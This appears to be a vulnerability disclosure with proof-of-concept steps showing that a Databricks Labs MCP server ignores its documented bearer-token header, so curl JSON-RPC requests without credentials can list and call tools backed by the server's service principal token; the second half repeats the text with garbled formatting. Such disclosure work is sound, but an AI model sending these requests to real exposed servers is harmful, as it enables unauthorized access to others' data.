FastAPI application serving Unity Catalog tools, Genie queries, and vector search has zero authentication middleware. The README and the built-in landing page both instruct clients to set Authorization: Bearer <token>, but the server never validates that header. When deployed standalone via uvicorn (a documented deployment path), any network-adjacent caller can invoke all registered MCP tools without credentials. Those tools execute against Databricks using the server's own service principal token, giving the unauthenticated caller indirect access to whatever the SP can reach: UC functions, Genie conversations, SQL query execution, and vector search indexes.
Step 1 -- Clone and install.
git clone https://github.com/databrickslabs/mcp.git /tmp/poc/mcp
cd /tmp/poc/mcp
uv sync
Step 2 -- Configure the server's SP credentials.
export DATABRICKS_HOST="https://your-workspace.cloud.databricks.com"
export DATABRICKS_TOKEN="dapi_your_service_principal_token"
export SCHEMA_FULL_NAME="catalog.schema"
Step 3 -- Start the server in standalone HTTP mode.
uv run uvicorn databricks.labs.mcp.servers.unity_catalog.app:app --host 0.0.0.0 --port 8000
Step 4 -- From another machine on the network, list tools without any Authorization header.
curl -s -X POST http://<server-ip>:8000/api/mcp/ \
-H "Content-Type: application/json" \
-d '{"jsonrpc":"2.0","id":1,"method":"tools/list","params":{}}' \
| python3 -m json.toolStep 5 -- Call a tool without any Authorization header.
curl -s -X POST http://<server-ip>:8000/api/mcp/ \
-H "Content-Type: application/json" \
-d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"genie_list_spaces","arguments":{}}}' \
| python3 -m json.toolWhat you observe. Step 4 returns a JSON-RPC response listing all registered tools (UC functions, vector search indexes, Genie tools). Step 5 returns data from the Genie API, fetched using the server's SP token. Neither request included an Authorization header.
FastAPI application serving Unity Catalog tools, Genie queries, and vector search has zero authentication middleware. The README and the built-in landing page both instruct clients to set
Authorization: Bearer <token>, but the server never validates that header. When deployed standalone viauvicorn(a documented deployment path), any network-adjacent caller can invoke all registered MCP tools without credentials. Those tools execute against Databricks using the server's own service principal token, giving the unauthenticated caller indirect access to whatever the SP can reach: UC functions, Genie conversations, SQL query execution, and vector search indexes.Step 1 -- Clone and install.
git clone https://github.com/databrickslabs/mcp.git /tmp/poc/mcp cd /tmp/poc/mcp uv syncStep 2 -- Configure the server's SP credentials.
Step 3 -- Start the server in standalone HTTP mode.
Step 4 -- From another machine on the network, list tools without any Authorization header.
Step 5 -- Call a tool without any Authorization header.
What you observe. Step 4 returns a JSON-RPC response listing all registered tools (UC functions, vector search indexes, Genie tools). Step 5 returns data from the Genie API, fetched using the server's SP token. Neither request included an
Authorizationheader.